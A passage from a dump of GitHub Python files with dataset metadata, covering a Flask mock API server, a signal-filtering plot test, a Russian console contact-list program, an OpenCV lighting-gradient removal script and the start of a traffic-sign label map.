methods=['POST'])\ndef reset():\n json_data['response']['data'] = []\n return \"\", 204\n\n\n@app.route('/api/v1/remove_data', methods=['DELETE'])\ndef delete_data():\n try:\n data = \"\"\n if len(request.args.to_dict().keys()) != 0:\n for key in request.args.keys():\n data = f'{data}{key}={request.args.get(key)} '\n return {\n 'status': 'success',\n 'msg': f'Data deleted for {data}'\n }, 202\n elif request.get_data().decode() != \"\":\n data = request.get_data().decode()\n if request.headers['content-type'] == 'application/json':\n data = json.loads(data)\n return {\n 'status': 'success',\n 'msg': f'Data deleted for {data}'\n }, 202\n else:\n return \"\", 204\n except Exception as e:\n return {\n 'status': 'failure',\n 'msg': f'{e}'\n }, 500\n\n@app.route('/api/v1/head', methods=['HEAD'])\ndef head():\n return {\"content\": \"some content\"}, 202\n\n@app.route('/api/v1/get-token', methods=['GET'])\n@auth.login_required\ndef get_token():\n global tokens\n username = auth.username()\n token = 'MjAyMS0wOS0yOCAwNTozNTo1Mi44MDg1NTNhZG1pbjQzNzM0'\n tokens[token] = username\n response = flask.Response()\n print(token)\n response.headers['Access-token'] = token\n return response\n\n@app.route('/token-auth', methods=['GET'])\n@bearer.login_required\ndef test_token_auth():\n return f\"welcome {bearer.current_user()}\", 200\n\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)", "repo_name": "shiv6/mock-server", "sub_path": "mock_server.py", "file_name": "mock_server.py", "file_ext": "py", "file_size_in_byte": 8970, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_httpauth.HTTPBasicAuth", "line_number": 15, "usage_type": "call"}, {"api_name": "flask_httpauth.HTTPTokenAuth", "line_number": 16, "usage_type": "call"}, {"api_name": 
"datetime.date.today", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 35, "usage_type": "call"}, {"api_name": "werkzeug.security.generate_password_hash", "line_number": 38, "usage_type": "call"}, {"api_name": "werkzeug.security.check_password_hash", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 75, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 93, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 95, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 107, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 117, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 119, "usage_type": "argument"}, {"api_name": "ipaddress.ip_network", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.globals.session", "line_number": 125, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.get_data", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.globals.session", "line_number": 135, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 137, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 139, "usage_type": "argument"}, {"api_name": "flask.globals.session", "line_number": 140, "usage_type": "argument"}, {"api_name": "flask.request.headers.get", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 147, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 147, "usage_type": "name"}, {"api_name": "xmltodict.unparse", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": 
"name"}, {"api_name": "xmltodict.unparse", "line_number": 170, "usage_type": "call"}, {"api_name": "flask.request.headers.get", "line_number": 181, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 181, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 181, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 184, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 184, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}, {"api_name": "xmltodict.parse", "line_number": 191, "usage_type": "call"}, {"api_name": "xmltodict.unparse", "line_number": 192, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 201, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 205, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 206, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 206, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 210, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 210, "usage_type": "name"}, {"api_name": "flask.request.args.to_dict", "line_number": 255, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 255, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.request.args.keys", "line_number": 256, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 257, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 257, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 262, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 262, "usage_type": "name"}, {"api_name": "flask.request.get_data", "line_number": 263, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 263, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 264, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 264, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 265, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 289, "usage_type": "call"}]} +{"seq_id": "4559228483", "text": "#!/usr/bin/env python3\n\"\"\"Tests signal filtering.\"\"\"\n# Python imports\nimport sys\nimport random\n\n# Dependency imports\nimport numpy as np\nimport pyqtgraph as pg\n\n# Package imports\nfrom .. 
import signal\n\ndef square_wave(length, gaussian_noisiness=2, salt_pepper_noisiness=2, amplitude=100):\n \"\"\"Returns a noisy square wave signal.\n High values have gaussian noise, while low values have salt-and-pepper noise.\n \"\"\"\n i = 0\n while i < length:\n for _ in range(0, 50):\n yield (i, 0 + random.gauss(0, gaussian_noisiness))\n i = i + 1\n for _ in range(0, 50):\n yield (i, amplitude * (random.randint(0, amplitude - 1) > salt_pepper_noisiness))\n i = i + 1\ndef sine_wave(length, gaussian_noisiness=2, amplitude=50):\n \"\"\"Returns a noisy sine wave signal with gaussian noise.\"\"\"\n i = 0\n sample_points = np.linspace(0.0, 2 * np.pi, num=length)\n wave = amplitude * (1 + np.sin(2 * np.pi * sample_points))\n for i in range(0, length):\n yield (i, wave[i] + random.gauss(0, gaussian_noisiness))\n\ndef stream(signal_generator):\n \"\"\"Continuously generates noisy data and filters it, then plots the results.\"\"\"\n signal_length = 500\n filterer = signal.moving_filter(10)\n\n # Plotting\n signal_x = []\n signal_y = []\n filtered_x = []\n filtered_y = []\n\n for (sample_number, sample) in signal_generator(signal_length):\n signal_x.append(sample_number)\n signal_y.append(sample)\n filtered = filterer.send((sample_number, sample))\n if filtered is not None:\n filtered_x.append(filtered[0])\n filtered_y.append(filtered[1])\n\n graph = pg.plot()\n graph.addLegend()\n graph.plot(signal_x, signal_y, pen='r', name=\"Raw (Noisy) Signal\")\n graph.plot(filtered_x, filtered_y, pen='b', name=\"Filtered Signal\")\n\nif __name__ == \"__main__\":\n pg.setConfigOptions(antialias=True, background='w', foreground='k')\n stream(square_wave)\n stream(sine_wave)\n sys.exit(pg.Qt.QtGui.QApplication.instance().exec_())\n", "repo_name": "ethanjli/vera-sleeve", "sub_path": "verasleeve/tests/signal_filtering.py", "file_name": "signal_filtering.py", "file_ext": "py", "file_size_in_byte": 2048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.gauss", "line_number": 21, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 30, "usage_type": "attribute"}, {"api_name": "random.gauss", "line_number": 32, "usage_type": "call"}, {"api_name": "pyqtgraph.plot", "line_number": 53, "usage_type": "call"}, {"api_name": "pyqtgraph.setConfigOptions", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 62, "usage_type": "call"}, {"api_name": "pyqtgraph.Qt.QtGui.QApplication.instance", "line_number": 62, "usage_type": "call"}, {"api_name": "pyqtgraph.Qt", "line_number": 62, "usage_type": "attribute"}]} +{"seq_id": "12326641246", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom datetime import date, datetime\n\nif __name__ == '__main__':\n # Список работников.\n people = []\n\n # Организовать бесконечный цикл запроса команд.\n while True:\n # Запрос команды\n command = input(\">>> \").lower()\n\n # Выполнить действие в соответствие с командой.\n if command == 'exit':\n break\n\n elif command == 'add':\n # Запросить данные о работнике.\n name = input(\"Фамилия и инициалы? \")\n post = input(\"Телефон? \")\n #year = input(\"Дата рождения? 
\")\n\n #year = date(int(year[2]), int(year[1]), int(year[0]))\n year = input(\"Введите дату рождения (гггг.мм.дд): \")\n year = year.split(\".\")\n year = date(int(year[0]), int(year[1]), int(year[2]))\n\n\n # Создать словарь.\n man = {\n 'name': name,\n 'tel': post,\n 'date': year,\n }\n\n # Добавить словарь в список.\n people.append(man)\n # Отсортировать список в случае необходимости.\n if len(people) > 1:\n people.sort(key=lambda item: item.get('tel', ''))\n\n elif command == 'list':\n # Заголовок таблицы.\n line = '+-{}-+-{}-+-{}-+-{}-+'.format(\n '-' * 4,\n '-' * 30,\n '-' * 20,\n '-' * 20\n )\n print(line)\n print(\n '| {:^4} | {:^30} | {:^20} | {:^20} |'.format(\n \"№\",\n \"Ф.И.О.\",\n \"Телефон\",\n \"Год рождения\"\n )\n )\n print(line)\n\n # Вывести данные о всех сотрудниках.\n for idx, man in enumerate(people, 1):\n print(\n '| {:>4} | {:<30} | {:<20} | {:>20} |'.format(\n idx,\n man.get('name', ''),\n man.get('tel', ''),\n str(man.get('date', ''))\n )\n )\n print(line)\n\n elif command.startswith('select'):\n\n # Разбить команду на части.\n parts = command.split(' ', maxsplit=1)\n # Получить имя.\n period = parts[1]\n count = 0\n # Проверить сведения работников из списка.\n for man in people:\n if man.get('name', period).lower() == period.lower():\n count += 1\n line = '+-{}-+-{}-+-{}-+-{}-+'.format(\n '-' * 4,\n '-' * 30,\n '-' * 20,\n '-' * 12\n )\n print(line)\n print(\n '| {:^4} | {:^30} | {:^20} | {:^12} |'.format(\n \"№\",\n \"Ф.И.О.\",\n \"Телефон\",\n \"Год рождения\"\n )\n )\n print(line)\n print(\n '| {:>4} | {:<30} | {:<20} | {:>12} |'.format(\n count,\n man.get('name', ''),\n man.get('tel', ''),\n str(man.get('date', 0))\n )\n )\n print(line)\n\n\n # Если счетчик равен 0, то работники не найдены.\n if count == 0:\n print(\"Люди с заданным именем не найдены.\")\n\n elif command == 'help':\n # Вывести справку о работе с программой.\n print(\"Список команд:\\n\")\n print(\"add - добавить человека;\")\n print(\"list - вывести список людей;\")\n print(\"select <имя> - запросить людей с этим именем;\")\n print(\"help - отобразить справку;\")\n print(\"exit - завершить работу с программой.\")\n\n else:\n print(f\"Неизвестная команда {command}\", file=sys.stderr)\n", "repo_name": "AndrejMirrox/labor-9", "sub_path": "PyCharm/Individual.py", "file_name": "Individual.py", "file_ext": "py", "file_size_in_byte": 4802, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 128, "usage_type": "attribute"}]} +{"seq_id": "2089442678", "text": "\"\"\"\r\n\r\n조명에 의해 생긴 Gradation을 제거하기 위해...\r\n\r\nclass removeLightGradation():\r\n 1. Check Image Size \r\n 2. LAB모델을 이용한 Color Space (RGB -> LAB변환)\r\n 3. Median Filter(Radius : 20 ~ 50, 100 : 실제와 가장 근사한 조명상태 구현)\r\n 4. 3번 이미지 반전하여 역조명 채널 생성\r\n 5. 원본영상에 합성\r\n 6. 
Histogram 최대-최소평균으로 Golbal Thresholding\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom cv2 import cv2\r\nimport math\r\n\r\n\r\nclass removeLightGradation:\r\n\r\n def __init__(self, img):\r\n self.img = img\r\n \r\n\r\n def convertLAB(self):\r\n return cv2.cvtColor(self.img, cv2.COLOR_BGR2LAB)\r\n\r\n\r\n def addMedianFilter(self, labImg, val = 55):\r\n filterImg = cv2.medianBlur(labImg, val)\r\n return filterImg\r\n \r\n\r\n def createReverseImg(self, filterImg):\r\n return cv2.bitwise_not(filterImg)\r\n\r\n\r\n def mergeImg(self, img1, img2):\r\n return cv2.add(img1, img2)\r\n \r\n def imgBlending(self, img1, img2, val):\r\n return cv2.addWeighted(img1, val, img2, 1-val, 0)\r\n\r\n\r\n def globalThresholding(self, img):\r\n #Histogram 의 최대-최소 평균으로 Global Thresholding\r\n ret, thr = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n return thr\r\n\r\n def thresholding(self, img, threshold = 127, value = 255):\r\n #ret, thr9 = cv2.threshold(img, threshold, value, cv2.THRESH_BINARY)\r\n thr10 = cv2.adaptiveThreshold(img, value, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2)\r\n thr11 = cv2.adaptiveThreshold(img, value, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\r\n\r\n titles = ['adaptive mean', 'adaptive gaussian']\r\n images = [thr10, thr11]\r\n showPlot(titles, images)\r\n\r\n\r\ndef showImg(title, img):\r\n cv2.imshow(title, img)\r\n\r\n cv2.waitKey(0)\r\n #k=cv2.waitKey(0) & 0xFF\r\n # if k == ord('s'):\r\n cv2.destroyAllWindows()\r\n\r\n\r\ndef showPlot(titles, images):\r\n \r\n num = len(titles)\r\n \r\n if num % 2 :\r\n row = int(num/2) + 1\r\n else:\r\n row = int(num/2)\r\n \r\n #print(\"num = {1}, row = {0}\".format(row, num))\r\n \r\n cnt = 0\r\n for i in range(0,row):\r\n cnt+=1\r\n plt.subplot(row, 2, cnt), plt.imshow(images[cnt-1], cmap = 'gray')\r\n plt.title(titles[cnt-1]), plt.xticks([]), plt.yticks([])\r\n #print(\"cnt = {0}, row = {1}, [cnt-1] = {2}\".format(cnt, row, cnt-1))\r\n\r\n cnt+=1\r\n \r\n try:\r\n if titles[i+2]:\r\n plt.subplot(row, 2, cnt), plt.imshow(images[cnt-1], cmap = 'gray')\r\n plt.title(titles[cnt-1]), plt.xticks([]), plt.yticks([])\r\n #print(\"cnt = {0}, row = {1}, [cnt-1] = {2}\".format(cnt, row, cnt-1)) \r\n except:\r\n pass \r\n \r\n plt.show()\r\n\r\n\r\ndef viewResult2(viewData, row, camp = ''):\r\n#viewData = {'Original': img, 'Gray Img' : img_gray, 'Alpha Img' : img_alp}\r\n\r\n dataLen = len(viewData)\r\n cols = math.ceil(dataLen/row)\r\n #print(\"cols = \", cols)\r\n\r\n i = 1\r\n for key, val in viewData.items():\r\n subplotNo = str(cols)+str(row)+str(i)\r\n #print('key = ', key)\r\n #print('subplotNo = ', subplotNo)\r\n #cv2.imshow(key, val)\r\n\r\n\r\n if(camp == 'gray') : \r\n plt.subplot(subplotNo), plt.imshow(val, cmap = 'gray')\r\n plt.title(key), plt.xticks([]), plt.yticks([])\r\n else :\r\n plt.subplot(subplotNo), plt.imshow(val)\r\n plt.title(key), plt.xticks([]), plt.yticks([]) \r\n\r\n i = i + 1\r\n # End of for key, val int viewData.items():\r\n plt.show()\r\n\r\n\r\n# End of viewResult2()\r\n# for i in range(1,11):\r\n# if i % 2 :\r\n# row = int(i/2) + 1\r\n# else:\r\n# row = int(i / 2)\r\n# #print(\"int({0} / 2) = {1}, int(round( {0} / 2)) = {2}\".format(i, int(i/2), int(round(i/2))))\r\n# print(\"i = {0}, row = {1}\".format(i, row))\r\n\r\n\r\n# Open Image - Color Image로 Open 해야 함.... 
\r\nimg = cv2.imread('gradation03.jpg', cv2.IMREAD_COLOR)\r\nshowImg(\"원본\", img)\r\n\r\nrt = removeLightGradation(img)\r\n\r\n# Change Color Space to LAB \r\nlabImg = rt.convertLAB()\r\n#showImg('LAB', labImg)\r\n\r\n# split Channel\r\nl, a, b = cv2.split(labImg)\r\n#showImg('labImg - l', l)\r\n#showImg('labImg - a', a)\r\n#showImg('labImg - b', b)\r\n\r\n\r\n# add Median Filter\r\nfilterImg = rt.addMedianFilter(l, 55)\r\n#showImg('Median 99', filterImg)\r\nlabFilterImg = rt.addMedianFilter(labImg, 55)\r\n\r\n# make sub Img(white - img)\r\nc, r = l.shape\r\noutImg = np.ones((c,r), np.uint8)*255\r\n#showImg('outImg', outImg)\r\n#print(l.shape)\r\n#print(outImg)\r\nsubImg = outImg - l\r\n#showImg('subImg', subImg)\r\n\r\nviewData = {'original':img, 'l':l, 'outImg':outImg, 'subImg':subImg}\r\nviewResult2(viewData, 2, 'gray')\r\n\r\nfor i in range(1,6):\r\n subImg = outImg - subImg\r\nshowImg('subImg', subImg)\r\n\r\n# make Reverse Image\r\nreverseImg = rt.createReverseImg(filterImg)\r\n#showImg('reverseImg', reverseImg)\r\nreverseImg1 = rt.createReverseImg(labFilterImg)\r\ngrayReverseImg = cv2.cvtColor(reverseImg1, cv2.COLOR_LAB2BGR)\r\ngrayReverseImg = cv2.cvtColor(grayReverseImg, cv2.COLOR_BGR2GRAY)\r\n\r\n\r\ntitles = ['Filter Img - l', 'Filter Img - LAB', 'Reverse Img - l', 'Reverse Img - LAB', 'Gray Reverse Img - LAB']\r\nimages = [filterImg, labFilterImg, reverseImg, reverseImg1, grayReverseImg]\r\nshowPlot(titles, images)\r\n\r\n\r\n\r\n# Image merge\r\nmergeImg = rt.mergeImg(l, reverseImg)\r\nmergeImg1 = rt.mergeImg(l, grayReverseImg)\r\nBlendingImg = rt.imgBlending(l, reverseImg, 0.5)\r\nBlendingImg1 = rt.imgBlending(l, grayReverseImg, 0.5)\r\n\r\ntitles = [\"Merge Img - l\", \"Merge Img - LAB\", \"Blending Img - l\", \"Blending Img - LAB\", 'Original Img']\r\nimages = [mergeImg, mergeImg1, BlendingImg, BlendingImg1, img]\r\nshowPlot(titles, images)\r\n\r\n# viewData = {\"Merge Img - l\":mergeImg, \"Merge Img - LAB\":mergeImg1, \"Blending Img - l\":BlendingImg, \"Blending Img - LAB\":BlendingImg1, 'Original Img':img}\r\n# viewResult2(viewData, 2)\r\n\r\n\r\nresultImg = rt.globalThresholding(mergeImg)\r\nresultImg1 = rt.globalThresholding(mergeImg1)\r\nresultImg2 = rt.globalThresholding(BlendingImg)\r\nresultImg3 = rt.globalThresholding(BlendingImg1)\r\n\r\n# titles = ['Threshold - Merge_L', 'Threshold Merge_LAB', 'Threshold - Blending_L', 'Threshold - Blending_LAB', 'Original Img']\r\n# images = [resultImg, resultImg1, resultImg2, resultImg3, img]\r\n# showPlot(titles, images)\r\n\r\nviewData = {'Threshold - Merge_L' : resultImg, 'Threshold Merge_LAB' : resultImg1, 'Threshold - Blending_L' : resultImg2, 'Threshold - Blending_LAB' : resultImg3, 'Original Img': img}\r\nviewResult2(viewData, 2, 'gray')\r\n\r\n\r\n# showImg('Result Img', resultImg)\r\n\r\n# rt.thresholding(resultImg)\r\n# rt.thresholding(resultImg1)\r\n# rt.thresholding(resultImg2)\r\n# rt.thresholding(resultImg3)\r\n\r\n\r\n#viewData = {'Original': img, 'Gray Img' : img_gray, 'Alpha Img' : img_alp}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "SSKim76/Python_Test", "sub_path": "removeGradation.py", "file_name": "removeGradation.py", "file_ext": "py", "file_size_in_byte": 6904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.cv2.cvtColor", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 28, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_BGR2LAB", "line_number": 28, "usage_type": "attribute"}, 
{"api_name": "cv2.cv2.medianBlur", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 32, "usage_type": "name"}, {"api_name": "cv2.cv2.bitwise_not", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 37, "usage_type": "name"}, {"api_name": "cv2.cv2.add", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 41, "usage_type": "name"}, {"api_name": "cv2.cv2.addWeighted", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 44, "usage_type": "name"}, {"api_name": "cv2.cv2.threshold", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 49, "usage_type": "name"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_OTSU", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cv2.adaptiveThreshold", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 54, "usage_type": "name"}, {"api_name": "cv2.cv2.ADAPTIVE_THRESH_MEAN_C", "line_number": 54, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 54, "usage_type": "attribute"}, {"api_name": "cv2.cv2.adaptiveThreshold", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 55, "usage_type": "name"}, {"api_name": "cv2.cv2.ADAPTIVE_THRESH_GAUSSIAN_C", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.cv2.imshow", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 63, "usage_type": "name"}, {"api_name": "cv2.cv2.waitKey", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 65, "usage_type": "name"}, {"api_name": "cv2.cv2.destroyAllWindows", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 118, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "cv2.cv2.imread", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 140, "usage_type": "name"}, {"api_name": "cv2.cv2.IMREAD_COLOR", "line_number": 140, "usage_type": "attribute"}, {"api_name": "cv2.cv2.split", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 163, "usage_type": "attribute"}, {"api_name": "cv2.cv2.cvtColor", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 181, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_LAB2BGR", "line_number": 181, "usage_type": "attribute"}, {"api_name": "cv2.cv2.cvtColor", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 182, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_BGR2GRAY", "line_number": 182, "usage_type": "attribute"}]} +{"seq_id": "985754575", "text": "import sys, os, argparse, csv, zipfile\nimport xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\n\nclass Generator():\n\n def __init__(self, path, classes=range(1, 156)):\n self.classes = classes\n self.labelmap = {0: \"speed limit 20 (prohibitory)\",\n 1: \"speed limit 30 (prohibitory)\",\n 2: \"speed limit 50 (prohibitory)\",\n 3: \"speed limit 60 (prohibitory)\",\n 4: \"speed limit 70 (prohibitory)\",\n 5: \"speed limit 80 (prohibitory)\",\n 6: \"restriction ends 80 (other)\",\n 7: \"speed limit 100 (prohibitory)\",\n 8: \"speed limit 120 (prohibitory)\",\n 9: \"no overtaking (prohibitory)\",\n 10: \"no overtaking (trucks) (prohibitory)\",\n 11: \"priority at next intersection (danger)\",\n 12: \"priority road (other)\",\n 13: \"give way (other)\",\n 14: \"stop (other)\",\n 15: \"no traffic both ways (prohibitory)\",\n 16: \"no trucks (prohibitory)\",\n 17: \"no entry (other)\",\n 18: \"danger (danger)\",\n 19: \"bend left (danger)\",\n 20: \"bend right (danger)\",\n 21: \"bend (danger)\",\n 22: \"uneven road (danger)\",\n 23: \"slippery road (danger)\",\n 24: \"road narrows (danger)\",\n 25: \"construction (danger)\",\n 26: \"traffic signal (danger)\",\n 27: \"pedestrian crossing (danger)\",\n 28: \"school crossing (danger)\",\n 29: \"cycles crossing (danger)\",\n 30: \"snow (danger)\",\n 31: \"animals (danger)\",\n 32: \"restriction ends (other)\",\n 33: \"go right 
